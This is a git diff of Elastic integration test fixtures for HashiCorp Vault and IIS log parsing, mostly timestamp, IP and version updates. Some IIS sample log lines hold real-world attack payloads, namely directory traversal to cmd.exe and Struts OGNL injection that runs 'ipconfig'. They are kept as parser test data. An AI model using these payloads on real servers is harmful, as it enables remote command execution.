e300c08b1898224fc76902c1fe3\"],\"renewable\":true,\"ttl\":179999812}},\"error\":\"\"}", "kind": "event", "action": "read", @@ -233,7 +233,7 @@ "ip": "127.0.0.1" }, "event": { - "ingested": "2021-07-22T19:55:04.737204754Z", + "ingested": "2021-12-09T13:39:31.476476900Z", "original": "{\"time\":\"2021-07-21T12:37:50.93608Z\",\"type\":\"request\",\"auth\":{\"client_token\":\"hmac-sha256:3aae134b7843218bf089cd9b01a55ec417346a242b5383a7fac2ab49692f403a\",\"accessor\":\"bar\",\"display_name\":\"testtoken\",\"policies\":[\"root\"],\"token_policies\":[\"web\"],\"identity_policies\":[\"ident1\",\"ident2\"],\"external_namespace_policies\":{\"ns1\":[\"baz\"]},\"no_default_policy\":true,\"metadata\":{\"id\":\"007\"},\"remaining_uses\":5,\"entity_id\":\"foobarentity\",\"token_type\":\"service\",\"token_ttl\":14400,\"token_issue_time\":\"2020-05-28T13:40:18-05:00\"},\"request\":{\"id\":\"002c8225-e859-44a0-9ccb-471c3655dbd8\",\"operation\":\"update\",\"mount_type\":\"kv\",\"client_token\":\"hmac-sha256:e890f27c5ee11e26bda7c8e6ec218af451a6b1e35f9fe6d0676f1b29889b406c\",\"client_token_accessor\":\"35e2f256-0fc3-4eea-9405-3e212435b6c7\",\"namespace\":{\"id\":\"root\"},\"path\":\"secrets/foo\",\"data\":{\"data\":\"hmac-sha256:46c0fd3146d89ff602279417df7ac9267ce58fa3c6d2535d2d9050a5323c21ec\"},\"policy_override\":true,\"remote_address\":\"127.0.0.1\",\"wrap_ttl\":3600,\"headers\":{\"foo\":[\"bar\"]}},\"error\":\"this is an error\"}", "kind": "event", "action": "update", @@ -371,7 +371,7 @@ "ip": "127.0.0.1" }, "event": { - "ingested": "2021-07-22T19:55:04.737206429Z", + "ingested": "2021-12-09T13:39:31.476482600Z", "original": "{\"time\":\"2021-07-21T12:37:50.936443Z\",\"type\":\"response\",\"auth\":{\"client_token\":\"hmac-sha256:3aae134b7843218bf089cd9b01a55ec417346a242b5383a7fac2ab49692f403a\",\"accessor\":\"bar\",\"display_name\":\"testtoken\",\"policies\":[\"root\"],\"token_policies\":[\"web\"],\"identity_policies\":[\"ident1\",\"ident2\"],\"external_namespace_policies\":{\"ns1\":[\"baz\"]},\"no_default_policy\":true,\"metadata\":{\"id\":\"007\"},\"remaining_uses\":5,\"entity_id\":\"foobarentity\",\"token_type\":\"service\",\"token_ttl\":14400,\"token_issue_time\":\"2020-05-28T13:40:18-05:00\"},\"request\":{\"id\":\"002c8225-e859-44a0-9ccb-471c3655dbd8\",\"operation\":\"update\",\"mount_type\":\"kv\",\"client_token\":\"hmac-sha256:e890f27c5ee11e26bda7c8e6ec218af451a6b1e35f9fe6d0676f1b29889b406c\",\"client_token_accessor\":\"35e2f256-0fc3-4eea-9405-3e212435b6c7\",\"namespace\":{\"id\":\"root\"},\"path\":\"secrets/foo\",\"data\":{\"data\":\"hmac-sha256:46c0fd3146d89ff602279417df7ac9267ce58fa3c6d2535d2d9050a5323c21ec\"},\"policy_override\":true,\"remote_address\":\"127.0.0.1\",\"wrap_ttl\":3600,\"headers\":{\"foo\":[\"bar\"]}},\"response\":{\"auth\":{\"client_token\":\"hmac-sha256:3aae134b7843218bf089cd9b01a55ec417346a242b5383a7fac2ab49692f403a\",\"accessor\":\"bar\",\"display_name\":\"testtoken\",\"policies\":[\"root\"],\"token_policies\":[\"web\"],\"identity_policies\":[\"ident1\",\"ident2\"],\"external_namespace_policies\":{\"ns1\":[\"baz\"]},\"no_default_policy\":true,\"metadata\":{\"id\":\"007\"},\"entity_id\":\"foobarentity\",\"token_type\":\"service\",\"token_ttl\":14400,\"token_issue_time\":\"2020-05-28T13:40:18-05:00\"},\"mount_type\":\"kv\",\"data\":{\"certificate\":\"hmac-sha256:cb232c6394c9149b7f06f85e8ed9fcc55b7d1db82dd0ec1d321d0a83a7adda01\"},\"redirect\":\"redirect\",\"wrap_info\":{\"ttl\":3600,\"token\":\"hmac-sha256:09dff0fdb8db56293383d7d0347afdf64ceb672cb9aea2c66edd802bcd714094\",\"accessor\":\"xzW2I9CMqcALsllhYvqtlsvq\",\"creation_time\":\"2020-05-28T18:40:18Z\",\"creation_path\":\"auth/token/create\",\"wrapped_accessor\":\"Bh57rT8zuhspG9APjXpGpiAJ\"},\"headers\":{\"Extra-Extra\":[\"read\"]}},\"error\":\"this is an error\"}", "kind": "event", "action": "update", diff --git a/packages/hashicorp_vault/data_stream/log/_dev/test/pipeline/test-log.log-expected.json b/packages/hashicorp_vault/data_stream/log/_dev/test/pipeline/test-log.log-expected.json index 6e935728165..f7e698bf375 100644 --- a/packages/hashicorp_vault/data_stream/log/_dev/test/pipeline/test-log.log-expected.json +++ b/packages/hashicorp_vault/data_stream/log/_dev/test/pipeline/test-log.log-expected.json @@ -16,7 +16,7 @@ "logger": "expiration" }, "event": { - "ingested": "2021-07-22T19:37:47.549316188Z", + "ingested": "2021-12-09T13:39:31.823398800Z", "kind": "event", "original": "{\"@level\":\"error\",\"@message\":\"failed to revoke lease\",\"@module\":\"expiration\",\"@timestamp\":\"2021-07-16T06:30:48.194192Z\",\"error\":\"failed to revoke entry: resp: (*logical.Response)(nil) err: RequestError: send request failed\\ncaused by: Post \\\"https://iam.amazonaws.com/\\\": dial tcp: lookup iam.amazonaws.com on 192.168.50.34:53: server misbehaving\",\"lease_id\":\"aws/creds/ddns-updater/oS5t84TSPRoYF2gX8McPyw4u\"}" }, @@ -40,7 +40,7 @@ "logger": "expiration" }, "event": { - "ingested": "2021-07-22T19:37:47.549319931Z", + "ingested": "2021-12-09T13:39:31.823409400Z", "kind": "event", "original": "{\"@level\":\"info\",\"@message\":\"revoked lease\",\"@module\":\"expiration\",\"@timestamp\":\"2021-07-16T06:33:08.867457Z\",\"lease_id\":\"auth/token/create/nomad-cluster/h15d750323d62439265743da0f02537e763b1968ba586b27770bd5262c9891a47\"}" }, @@ -68,7 +68,7 @@ "logger": "core.cluster-listener" }, "event": { - "ingested": "2021-07-22T19:37:47.549321843Z", + "ingested": "2021-12-09T13:39:31.823413700Z", "kind": "event", "original": "{\"@level\":\"info\",\"@message\":\"serving cluster requests\",\"@module\":\"core.cluster-listener\",\"@timestamp\":\"2021-07-09T17:20:27.184340Z\",\"cluster_listen_address\":{\"IP\":\"::\",\"Port\":8201,\"Zone\":\"\"}}" }, @@ -92,7 +92,7 @@ "logger": "storage.raft" }, "event": { - "ingested": "2021-07-22T19:37:47.549323663Z", + "ingested": "2021-12-09T13:39:31.823418500Z", "kind": "event", "original": "{\"@level\":\"info\",\"@message\":\"creating Raft\",\"@module\":\"storage.raft\",\"@timestamp\":\"2021-07-09T17:20:27.190451Z\",\"config\":\"\\u0026raft.Config{ProtocolVersion:3, HeartbeatTimeout:5000000000, ElectionTimeout:5000000000, CommitTimeout:50000000, MaxAppendEntries:64, BatchApplyCh:false, ShutdownOnRemove:true, TrailingLogs:0x2800, SnapshotInterval:120000000000, SnapshotThreshold:0x2000, LeaderLeaseTimeout:2500000000, LocalID:\\\"compute03-example-com\\\", NotifyCh:(chan\\u003c- bool)(0x4000324070), LogOutput:io.Writer(nil), LogLevel:\\\"DEBUG\\\", Logger:(*hclog.interceptLogger)(0x400057f2f0), NoSnapshotRestoreOnStart:true, skipStartup:false}\"}" }, @@ -120,7 +120,7 @@ "logger": "core.cluster-listener.tcp" }, "event": { - "ingested": "2021-07-22T19:37:47.549325442Z", + "ingested": "2021-12-09T13:39:31.823424400Z", "kind": "event", "original": "{\"@level\":\"info\",\"@message\":\"starting listener\",\"@module\":\"core.cluster-listener.tcp\",\"@timestamp\":\"2021-07-09T17:20:27.182327Z\",\"listener_address\":{\"IP\":\"0.0.0.0\",\"Port\":8201,\"Zone\":\"\"}}" }, @@ -145,7 +145,7 @@ "logger": "storage.raft" }, "event": { - "ingested": "2021-07-22T19:37:47.549327405Z", + "ingested": "2021-12-09T13:39:31.823430200Z", "kind": "event", "original": "{\"@level\":\"info\",\"@message\":\"initial configuration\",\"@module\":\"storage.raft\",\"@timestamp\":\"2021-07-09T17:20:27.212828Z\",\"index\":7788,\"servers\":\"[{Suffrage:Voter ID:compute03-example-com Address:192.168.50.36:8201} {Suffrage:Voter ID:compute02-example-com Address:192.168.50.35:8201} {Suffrage:Voter ID:compute01-example-com Address:192.168.50.34:8201}]\"}" }, @@ -170,7 +170,7 @@ "logger": "storage.raft" }, "event": { - "ingested": "2021-07-22T19:37:47.549329215Z", + "ingested": "2021-12-09T13:39:31.823434300Z", "kind": "event", "original": "{\"@level\":\"warn\",\"@message\":\"failed to contact\",\"@module\":\"storage.raft\",\"@timestamp\":\"2021-07-09T17:04:06.945541Z\",\"server-id\":\"compute03-example-com\",\"time\":4959141198}" }, @@ -194,7 +194,7 @@ "logger": "core.raft" }, "event": { - "ingested": "2021-07-22T19:37:47.549331028Z", + "ingested": "2021-12-09T13:39:31.823438400Z", "kind": "event", "original": "{\"@level\":\"info\",\"@message\":\"installed new raft TLS key\",\"@module\":\"core.raft\",\"@timestamp\":\"2021-07-16T19:05:02.795425Z\",\"term\":402}" }, @@ -219,7 +219,7 @@ "level": "info" }, "event": { - "ingested": "2021-07-22T19:37:47.549332843Z", + "ingested": "2021-12-09T13:39:31.823441900Z", "kind": "event", "original": "{\"@level\":\"info\",\"@message\":\"proxy environment\",\"@timestamp\":\"2021-07-09T17:01:42.203665Z\",\"http_proxy\":\"\",\"https_proxy\":\"\",\"no_proxy\":\"\"}" }, @@ -243,7 +243,7 @@ "logger": "audit" }, "event": { - "ingested": "2021-07-22T19:37:47.549334656Z", + "ingested": "2021-12-09T13:39:31.823446400Z", "kind": "event", "original": "{\"@level\":\"debug\",\"@message\":\"adding reload function\",\"@module\":\"audit\",\"@timestamp\":\"2021-07-22T17:33:20.689412Z\",\"path\":\"file/\"}" }, @@ -271,7 +271,7 @@ "logger": "audit" }, "event": { - "ingested": "2021-07-22T19:37:47.549336472Z", + "ingested": "2021-12-09T13:39:31.823452200Z", "kind": "event", "original": "{\"@level\":\"debug\",\"@message\":\"file backend options\",\"@module\":\"audit\",\"@timestamp\":\"2021-07-22T17:33:20.689526Z\",\"file_path\":\"/vault/logs/audit.json\",\"path\":\"file/\"}" }, @@ -296,7 +296,7 @@ "logger": "core" }, "event": { - "ingested": "2021-07-22T19:37:47.549338771Z", + "ingested": "2021-12-09T13:39:31.823458400Z", "kind": "event", "original": "{\"@level\":\"info\",\"@message\":\"enabled audit backend\",\"@module\":\"core\",\"@timestamp\":\"2021-07-22T17:33:20.691959Z\",\"path\":\"file/\",\"type\":\"file\"}" }, diff --git a/packages/hashicorp_vault/manifest.yml b/packages/hashicorp_vault/manifest.yml index a8e206e004a..e156af8d443 100644 --- a/packages/hashicorp_vault/manifest.yml +++ b/packages/hashicorp_vault/manifest.yml @@ -1,7 +1,7 @@ format_version: 1.0.0 name: hashicorp_vault title: Hashicorp Vault -version: 1.2.0 +version: 1.2.1 license: basic description: Collect logs and metrics from Hashicorp Vault with Elastic Agent. type: integration diff --git a/packages/iis/changelog.yml b/packages/iis/changelog.yml index b081204c58e..3d9b232003e 100644 --- a/packages/iis/changelog.yml +++ b/packages/iis/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "0.8.1" + changes: + - description: Change test public IPs to the supported subset + type: bugfix + link: https://github.com/elastic/integrations/pull/2327 - version: "0.8.0" changes: - description: Support Kibana 8.0 diff --git a/packages/iis/data_stream/access/_dev/test/pipeline/test-iis-access-72.log-expected.json b/packages/iis/data_stream/access/_dev/test/pipeline/test-iis-access-72.log-expected.json index c18a42999d5..85808183cd4 100644 --- a/packages/iis/data_stream/access/_dev/test/pipeline/test-iis-access-72.log-expected.json +++ b/packages/iis/data_stream/access/_dev/test/pipeline/test-iis-access-72.log-expected.json @@ -46,7 +46,7 @@ }, "event": { "duration": 0, - "ingested": "2021-06-09T11:14:31.731260200Z", + "ingested": "2021-12-09T13:39:33.179061100Z", "original": "2018-12-31 12:02:53 10.44.0.136 GET /pbserver/..À¯..À¯..À¯..À¯..À¯../winnt/system32/cmd.exe /c+dir+c:\\+/OG 8080 - 10.50.6.188 Mozilla/4.0+(compatible;+MSIE+8.0;+Windows+NT+5.1;+Trident/4.0) - 404 0 64 0", "kind": "event", "category": [ @@ -118,7 +118,7 @@ }, "event": { "duration": 46000000, - "ingested": "2021-06-09T11:14:31.731282500Z", + "ingested": "2021-12-09T13:39:33.179069800Z", "original": "2018-12-31 12:02:53 10.44.0.136 GET /pbserver/..ÁÁ..ÁÁ..ÁÁ..ÁÁ..ÁÁ../winnt/system32/cmd.exe /c+dir+c:\\+/OG 8080 - 10.50.6.188 Mozilla/4.0+(compatible;+MSIE+8.0;+Windows+NT+5.1;+Trident/4.0) - 404 0 2 46", "kind": "event", "category": [ @@ -188,7 +188,7 @@ }, "event": { "duration": 0, - "ingested": "2021-06-09T11:14:31.731289600Z", + "ingested": "2021-12-09T13:39:33.179075800Z", "original": "2018-12-31 12:02:53 10.44.0.136 GET /Director - 443 - 10.50.6.188 Mozilla/4.0+(compatible;+MSIE+8.0;+Windows+NT+5.1;+Trident/4.0) - 401 0 0 0", "kind": "event", "category": [ @@ -258,7 +258,7 @@ }, "event": { "duration": 0, - "ingested": "2021-06-09T11:14:31.731294600Z", + "ingested": "2021-12-09T13:39:33.179081600Z", "original": "2018-12-31 12:02:53 10.44.0.136 GET / - 443 - 10.50.6.188 Mozilla/4.0+(compatible;+MSIE+8.0;+Windows+NT+5.1;+Trident/4.0) - 401 0 0 0", "kind": "event", "category": [ @@ -330,7 +330,7 @@ }, "event": { "duration": 15000000, - "ingested": "2021-06-09T11:14:31.731306700Z", + "ingested": "2021-12-09T13:39:33.179087400Z", "original": "2018-12-31 12:02:53 10.44.0.136 GET /pbserver/..Áœ..Áœ..Áœ..Áœ..Áœ../winnt/system32/cmd.exe /c+dir+c:\\+/OG 8080 - 10.50.6.188 Mozilla/4.0+(compatible;+MSIE+8.0;+Windows+NT+5.1;+Trident/4.0) - 404 0 64 15", "kind": "event", "category": [ diff --git a/packages/iis/data_stream/access/_dev/test/pipeline/test-iis-access-75.log b/packages/iis/data_stream/access/_dev/test/pipeline/test-iis-access-75.log index 4211680cb61..05c891905f0 100644 --- a/packages/iis/data_stream/access/_dev/test/pipeline/test-iis-access-75.log +++ b/packages/iis/data_stream/access/_dev/test/pipeline/test-iis-access-75.log @@ -1,4 +1,4 @@ 2018-08-28 18:24:25 [10.100.220.70](http://10.100.220.70) GET / - 80 - [10.100.118.31](http://10.100.118.31) Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+6.3;+WOW64;+Trident/7.0;+.NET4.0E;+.NET4.0C;+.NET+CLR+3.5.30729;+.NET+CLR[+2.0.50727](tel:+2050727);+.NET+CLR+3.0.30729) 404 4 2 792 2019-03-06 18:43:17 10.0.140.107 GET /health-monitoring - 80 - 10.0.140.2 - 200 0 0 15 2019-03-06 18:43:17 10.0.140.107 GET /health-monitoring - 80 - 10.0.140.2 - 200 0 0 15 -2019-03-06 18:43:17 2001:cdba:0000:0000:0000:0000:3257:9652 GET /health-monitoring - 80 - 2001:cdba:0000:0000:0000:0000:3257:9652 - 200 0 0 15 +2019-03-06 18:43:17 2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6 GET /health-monitoring - 80 - 2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6 - 200 0 0 15 diff --git a/packages/iis/data_stream/access/_dev/test/pipeline/test-iis-access-75.log-expected.json b/packages/iis/data_stream/access/_dev/test/pipeline/test-iis-access-75.log-expected.json index b0c707e04a1..1a6cef5e3a7 100644 --- a/packages/iis/data_stream/access/_dev/test/pipeline/test-iis-access-75.log-expected.json +++ b/packages/iis/data_stream/access/_dev/test/pipeline/test-iis-access-75.log-expected.json @@ -44,7 +44,7 @@ }, "event": { "duration": 792000000, - "ingested": "2021-06-09T11:14:31.949859100Z", + "ingested": "2021-12-09T13:39:34.018260800Z", "original": "2018-08-28 18:24:25 [10.100.220.70](http://10.100.220.70) GET / - 80 - [10.100.118.31](http://10.100.118.31) Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+6.3;+WOW64;+Trident/7.0;+.NET4.0E;+.NET4.0C;+.NET+CLR+3.5.30729;+.NET+CLR[+2.0.50727](tel:+2050727);+.NET+CLR+3.0.30729) 404 4 2 792", "kind": "event", "category": [ @@ -114,7 +114,7 @@ }, "event": { "duration": 15000000, - "ingested": "2021-06-09T11:14:31.949903600Z", + "ingested": "2021-12-09T13:39:34.018269200Z", "original": "2019-03-06 18:43:17 10.0.140.107 GET /health-monitoring - 80 - 10.0.140.2 - 200 0 0 15", "kind": "event", "category": [ @@ -171,7 +171,7 @@ }, "event": { "duration": 15000000, - "ingested": "2021-06-09T11:14:31.949909300Z", + "ingested": "2021-12-09T13:39:34.018275Z", "original": "2019-03-06 18:43:17 10.0.140.107 GET /health-monitoring - 80 - 10.0.140.2 - 200 0 0 15", "kind": "event", "category": [ @@ -188,12 +188,27 @@ "temp": {}, "destination": { "port": 80, - "address": "2001:cdba:0000:0000:0000:0000:3257:9652", - "ip": "2001:cdba:0000:0000:0000:0000:3257:9652" + "address": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", + "ip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" }, "source": { - "address": "2001:cdba:0000:0000:0000:0000:3257:9652", - "ip": "2001:cdba:0000:0000:0000:0000:3257:9652" + "geo": { + "continent_name": "Europe", + "country_name": "Denmark", + "location": { + "lon": 10.0, + "lat": 56.0 + }, + "country_iso_code": "DK" + }, + "as": { + "number": 62121, + "organization": { + "name": "Christian Ebsen ApS" + } + }, + "address": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", + "ip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" }, "url": { "path": "/health-monitoring", @@ -214,8 +229,8 @@ }, "related": { "ip": [ - "2001:cdba:0000:0000:0000:0000:3257:9652", - "2001:cdba:0000:0000:0000:0000:3257:9652" + "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", + "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" ] }, "http": { @@ -228,8 +243,8 @@ }, "event": { "duration": 15000000, - "ingested": "2021-06-09T11:14:31.949913800Z", - "original": "2019-03-06 18:43:17 2001:cdba:0000:0000:0000:0000:3257:9652 GET /health-monitoring - 80 - 2001:cdba:0000:0000:0000:0000:3257:9652 - 200 0 0 15", + "ingested": "2021-12-09T13:39:34.018280500Z", + "original": "2019-03-06 18:43:17 2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6 GET /health-monitoring - 80 - 2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6 - 200 0 0 15", "kind": "event", "category": [ "web", diff --git a/packages/iis/data_stream/access/_dev/test/pipeline/test-iis-access.log b/packages/iis/data_stream/access/_dev/test/pipeline/test-iis-access.log index a2ce20afbf0..740365e42ce 100644 --- a/packages/iis/data_stream/access/_dev/test/pipeline/test-iis-access.log +++ b/packages/iis/data_stream/access/_dev/test/pipeline/test-iis-access.log @@ -1,5 +1,5 @@ -2018-01-01 08:09:10 127.0.0.1 GET / q=100 80 - 85.181.35.98 Mozilla/5.0+(Windows+NT+6.1;+Win64;+x64;+rv:57.0)+Gecko/20100101+Firefox/57.0 - 200 0 0 123 +2018-01-01 08:09:10 127.0.0.1 GET / q=100 80 - 67.43.156.13 Mozilla/5.0+(Windows+NT+6.1;+Win64;+x64;+rv:57.0)+Gecko/20100101+Firefox/57.0 - 200 0 0 123 2018-01-01 09:10:11 W3SVC1 GET / - 80 - 127.0.0.1 Mozilla/5.0+(Windows+NT+6.1;+Win64;+x64;+rv:57.0)+Gecko/20100101+Firefox/57.0 - - example.com 200 0 0 123 456 789 -2018-01-01 10:11:12 W3SVC1 MACHINE-NAME 127.0.0.1 GET / - 80 - 85.181.35.98 HTTP/1.1 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_14_0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.102+Safari/537.36 - - example.com 200 0 0 123 456 789 +2018-01-01 10:11:12 W3SVC1 MACHINE-NAME 127.0.0.1 GET / - 80 - 67.43.156.13 HTTP/1.1 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_14_0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.102+Safari/537.36 - - example.com 200 0 0 123 456 789 2018-12-31 12:52:33 10.44.0.136 GET / redirect:${%23req%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),%23webroot%3d%23req.getSession().getServletContext().getRealPath('/'),%23resp.println(%23webroot),%23resp.flush(),%23resp.close()} 443 - 10.50.6.188 Mozilla/4.0+(compatible;+MSIE+8.0;+Windows+NT+5.1;+Trident/4.0) - 401 0 0 0 2018-12-31 12:52:33 10.44.0.136 GET /${#context['xwork.MethodAccessor.denyMethodExecution']=!(#_memberAccess['allowStaticMethodAccess']=true),(@java.lang.Runtime@getRuntime()).exec('ipconfig').waitFor()}.action - 443 - 10.50.6.188 Mozilla/4.0+(compatible;+MSIE+8.0;+Windows+NT+5.1;+Trident/4.0) - 404 0 2 0 \ No newline at end of file diff --git a/packages/iis/data_stream/access/_dev/test/pipeline/test-iis-access.log-expected.json b/packages/iis/data_stream/access/_dev/test/pipeline/test-iis-access.log-expected.json index 584a0ebf980..66b85833c29 100644 --- a/packages/iis/data_stream/access/_dev/test/pipeline/test-iis-access.log-expected.json +++ b/packages/iis/data_stream/access/_dev/test/pipeline/test-iis-access.log-expected.json @@ -8,26 +8,8 @@ "ip": "127.0.0.1" }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "DE-BE", - "city_name": "Berlin", - "country_iso_code": "DE", - "country_name": "Germany", - "region_name": "Land Berlin", - "location": { - "lon": 13.4531, - "lat": 52.4473 - } - }, - "as": { - "number": 6805, - "organization": { - "name": "Telefonica Germany" - } - }, - "address": "85.181.35.98", - "ip": "85.181.35.98" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "url": { "path": "/", @@ -49,7 +31,7 @@ }, "related": { "ip": [ - "85.181.35.98", + "67.43.156.13", "127.0.0.1" ] }, @@ -63,8 +45,8 @@ }, "event": { "duration": 123000000, - "ingested": "2021-06-09T11:14:32.017302600Z", - "original": "2018-01-01 08:09:10 127.0.0.1 GET / q=100 80 - 85.181.35.98 Mozilla/5.0+(Windows+NT+6.1;+Win64;+x64;+rv:57.0)+Gecko/20100101+Firefox/57.0 - 200 0 0 123", + "ingested": "2021-12-09T13:39:34.416760400Z", + "original": "2018-01-01 08:09:10 127.0.0.1 GET / q=100 80 - 67.43.156.13 Mozilla/5.0+(Windows+NT+6.1;+Win64;+x64;+rv:57.0)+Gecko/20100101+Firefox/57.0 - 200 0 0 123", "kind": "event", "category": [ "web", @@ -139,7 +121,7 @@ }, "event": { "duration": 789000000, - "ingested": "2021-06-09T11:14:32.017316Z", + "ingested": "2021-12-09T13:39:34.416769800Z", "original": "2018-01-01 09:10:11 W3SVC1 GET / - 80 - 127.0.0.1 Mozilla/5.0+(Windows+NT+6.1;+Win64;+x64;+rv:57.0)+Gecko/20100101+Firefox/57.0 - - example.com 200 0 0 123 456 789", "category": [ "web" @@ -170,26 +152,8 @@ "ip": "127.0.0.1" }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "DE-BE", - "city_name": "Berlin", - "country_iso_code": "DE", - "country_name": "Germany", - "region_name": "Land Berlin", - "location": { - "lon": 13.4531, - "lat": 52.4473 - } - }, - "as": { - "number": 6805, - "organization": { - "name": "Telefonica Germany" - } - }, - "address": "85.181.35.98", - "ip": "85.181.35.98" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "url": { "path": "/", @@ -213,7 +177,7 @@ }, "related": { "ip": [ - "85.181.35.98", + "67.43.156.13", "127.0.0.1" ] }, @@ -234,8 +198,8 @@ }, "event": { "duration": 789000000, - "ingested": "2021-06-09T11:14:32.017361700Z", - "original": "2018-01-01 10:11:12 W3SVC1 MACHINE-NAME 127.0.0.1 GET / - 80 - 85.181.35.98 HTTP/1.1 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_14_0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.102+Safari/537.36 - - example.com 200 0 0 123 456 789", + "ingested": "2021-12-09T13:39:34.416775900Z", + "original": "2018-01-01 10:11:12 W3SVC1 MACHINE-NAME 127.0.0.1 GET / - 80 - 67.43.156.13 HTTP/1.1 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_14_0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.102+Safari/537.36 - - example.com 200 0 0 123 456 789", "kind": "event", "category": [ "web", @@ -305,7 +269,7 @@ }, "event": { "duration": 0, - "ingested": "2021-06-09T11:14:32.017367700Z", + "ingested": "2021-12-09T13:39:34.416781800Z", "original": "2018-12-31 12:52:33 10.44.0.136 GET / redirect:${%23req%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),%23webroot%3d%23req.getSession().getServletContext().getRealPath('/'),%23resp.println(%23webroot),%23resp.flush(),%23resp.close()} 443 - 10.50.6.188 Mozilla/4.0+(compatible;+MSIE+8.0;+Windows+NT+5.1;+Trident/4.0) - 401 0 0 0", "kind": "event", "category": [ @@ -374,7 +338,7 @@ }, "event": { "duration": 0, - "ingested": "2021-06-09T11:14:32.017372200Z", + "ingested": "2021-12-09T13:39:34.416787800Z", "original": "2018-12-31 12:52:33 10.44.0.136 GET /${#context['xwork.MethodAccessor.denyMethodExecution']=!(#_memberAccess['allowStaticMethodAccess']=true),(@java.lang.Runtime@getRuntime()).exec('ipconfig').waitFor()}.action - 443 - 10.50.6.188 Mozilla/4.0+(compatible;+MSIE+8.0;+Windows+NT+5.1;+Trident/4.0) - 404 0 2 0", "kind": "event", "category": [ diff --git a/packages/iis/data_stream/access/_dev/test/pipeline/test-ipv6zone.log-expected.json b/packages/iis/data_stream/access/_dev/test/pipeline/test-ipv6zone.log-expected.json index 337c173f877..d4514daef9c 100644 --- a/packages/iis/data_stream/access/_dev/test/pipeline/test-ipv6zone.log-expected.json +++ b/packages/iis/data_stream/access/_dev/test/pipeline/test-ipv6zone.log-expected.json @@ -55,7 +55,7 @@ }, "event": { "duration": 789000000, - "ingested": "2021-06-09T11:14:32.162635600Z", + "ingested": "2021-12-09T13:39:35.246884600Z", "original": "2018-01-01 10:11:12 W3SVC1 MACHINE-NAME ::1%0 GET / - 80 - ::1%0 HTTP/1.1 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_14_0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.102+Safari/537.36 - - example.com 200 0 0 123 456 789", "kind": "event", "category": [ diff --git a/packages/iis/data_stream/access/_dev/test/pipeline/test-x-forward-for-extended.log b/packages/iis/data_stream/access/_dev/test/pipeline/test-x-forward-for-extended.log index fbe5b8c3697..c2e3c332699 100644 --- a/packages/iis/data_stream/access/_dev/test/pipeline/test-x-forward-for-extended.log +++ b/packages/iis/data_stream/access/_dev/test/pipeline/test-x-forward-for-extended.log @@ -1,6 +1,6 @@ -2020-10-04 22:00:34 W3SVC2 freca1 10.24.129.162 GET /favicon.ico - 80 - 10.24.136.240 HTTP/1.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:81.0)+Gecko/20100101+Firefox/81.0 - https://images.hogeschoolrotterdam.nl/Blob/adeec119008c48758c1a6be53aeeb2ac/34ff475072d54117bcb46ea7f023bd87.jpg?width=1200&height=630&mode=crop images.hogeschoolrotterdam.nl 404 0 2 1437 534 0 116.189.86.89 -2020-10-05 21:40:30 W3SVC2 freca1 10.24.129.162 GET /robots.txt - 80 - 10.24.136.240 HTTP/1.1 Twitterbot/1.0 - - images.hogeschoolrotterdam.nl 200 0 0 346 306 0 119.16.157.180 -2020-10-05 21:48:33 W3SVC2 freca1 10.24.129.162 GET /app_data/cache/9/e/1/c/3/7/9e1c37a203a2a306e8f5d4df1bddb1109dd42e57.jpg width=35&height=38&mode=crop 80 - 10.24.136.240 HTTP/1.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.102+Safari/537.36+Edge/18.18362 BIGipServerYAkgvoMsadfHHYQAGkWEWnyAqAads=27246369425.20480.0000 https://www.rotterdamuas.com/ images.hogeschoolrotterdam.nl 200 0 0 2007 581 15 119.160.162.213 -2020-10-05 21:48:33 W3SVC2 freca1 10.24.129.162 GET /app_data/cache/f/b/7/1/2/7/fb71277260ae26a108c3608ce1a62474a55b2556.jpg width=75&height=40&mode=crop 80 - 10.24.136.240 HTTP/1.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.102+Safari/537.36+Edge/18.18362 BIGipServerYAkgvoMHHYQAGkWEWadfsadfnyAqAere=27246369425.20480.0000 https://www.rotterdamuas.com/ images.hogeschoolrotterdam.nl 200 0 0 2926 581 0 119.160.162.213 -2020-10-08 22:00:22 W3SVC2 freca1 10.24.129.162 GET /Blob/a9e2fe596ac14a4ab07beb6b6e2c6545/15a3917cacf44de59af9cc899e90a9d4.png width=60&height=20&mode=crop 80 - 10.24.136.240 HTTP/1.1 Mozilla/5.0+(iPhone;+CPU+iPhone+OS+13_7+like+Mac+OS+X)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/13.1.2+Mobile/15E148+Safari/604.1 